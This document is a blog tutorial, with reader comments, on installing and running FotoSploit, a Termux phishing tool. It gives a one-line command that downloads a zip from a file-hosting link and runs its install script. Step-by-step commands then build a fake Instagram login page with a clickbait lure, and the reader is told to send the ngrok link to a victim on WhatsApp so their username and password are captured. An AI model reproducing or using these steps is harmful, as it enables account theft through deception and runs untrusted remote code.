What is FotoSploit tool in Temux?
Install FotoSploit in Termux [ UPDATED COMMANDS ]:
pkg update && pkg upgrade -y && pkg install php python2 git wget -y && cd && wget https://download844.mediafire.com/iot744ake2kgbohL6IbMH3MsDcIyY3kvwxr96ca4V2ZM5k24TygLQN1YJ0ddXQsac8eMMkHw88YkVGYIcz9kqCQcnPn5LpbfqXJXCBwGCh5OJ7uZ6VstU7VGRPL0FZAMxFrbUZBIjv6RQNP9p1jdJ2qupsT7nhgHToJSFSuELdgHBy9M/cgjxkb3z4hqkhj8/Fotosploit-master.zip && unzip Fotosploit-master.zip && cd Fotosploit-master && bash install.sh --install --premium && cd && mv Fotosploit-master FotoSploit && exit
The Termux application will be automatically closed after this command completes so re-open termux and then follow the below steps.
Use FotoSploit in Termux:
whenever you open termux again and you wanna use this tool then you need to follow the below steps.
Step 1:
After restarting termux you will be in-home directory and to use foto sploit you need to change your directory to Fotosploit folder. run below command.
cd FotoSploit
Step 2:
Now you need to run the fotosploit bash file to execute the tool. just type the below command and the tool will start.
bash FotoSploit
Now you are in the FotoSploit tool.
Step 3 :
To know the options you need to type the below command, if you know how to use Metasploit then you can easily use this tool.
show options
Step 4 :
before doing this step you need to find a photo in your phone which you wanna show in your link, Make sure the size of the photo is very less (5kb to 10k is good.) If you don't have any image file and you wanna download the image file Direclty in termux then read this post [How to Download Files In Termux - 2021] and now you need to copy the path of that photo and paste in below command.
set foto path-of-your-picture
e.g: set foto /data/data/com.termux/files/home/pic.jpg
Step 5 :
Now you need to set your view, the view is the website phishing page that you wanna use, I am gonna make a phishing page for Instagram so I am setting my view as Instagram. you can type set view --help to get the list of views and to set the view you need to type the below command.
set view instagram
Step 6 :
The title URL is the text that you will see at the top of the phishing link post on Whatsapp. You can use the below command to set the title, make sure to keep the title interesting.
set title url Steve Jobs Actually Alive
You can add your own text in the above command.
Step 7 :
Now you need to set the action URL, This is the redirect URL and after the victim fills the credentials then the victim will be redirected to this Link. type below command to set action url.
set action url https://www.instagram.com/stevejobs
Change the URL in the above command to your redirection URL.
Step 8 :
Now you need to set the red social, here you need to choose which type of phishing page you want to create, if you need help then you can type set red social --help and you will see multiple versions of the same website, select a version that suits your social engineering. I am using normal Instagram in below command.
set red social instagram
change the green part with other websites, Like facebook.
Step 9 :
set mini title It's widely known that Steve Jobs is Dead but his insta ID is still active and his images...
Step 10 :
Now everything is done and you just have to run the fotosploit tool, before running the tool make sure you turn on your Hotspot. type below command to run the tool.
Step 11 :
Now you will see multiple URLs and you have to copy the ngrok URL and you need to paste it on the victim's WhatsApp chat box and wait for 10 sec so images and texts can get loaded. after everything is loaded then you can click on the send button.
Step 12 :
After the victim clicks on the link you will get the username and password in your termux terminl like shown in the below picture.
Things you should know about this tool:
- This tool only works when you share the link on WhatsApp and telegram.
- Fotosploit uses Ngrok so you need to turn on your hotspot, so basically, it won't work on wifi network.
- sometimes Ngrok tunnel fails so that is totally normal just try again. (It's ngrok's fault maybe)
- You need to paste the link on WhatsApp and then wait for 10sec so everything can load properly.
- If you try to use this tool more than once in the same session then it won't work so if anything is not working, Just Restart your Termux.
Good {
ReplyDeleteI know feel like a hacker already
ReplyDeleteUsername for 'https://github.com':
ReplyDeletePassword for 'https://github.com':
What's the Un & pas
I am sorry the repo was deleted from the github, but i have updated the commands now so you won't face the same issue again.
DeleteHello .I'm so glad to finding your web out .I have used all yours post to explain my followers on YouTube ..and I have mentioned your channel and web for further information.
ReplyDeleteSo today I am on trouble with my Termux ... Can you help me please?
I can not run fotosploit ...it ask me abou the GitHub Username and Password word .. what is it .
I am sorry the repo was deleted from the GitHub, but I have updated the commands now, so you won't face the same issue again. BTW what is your YouTube channel's name?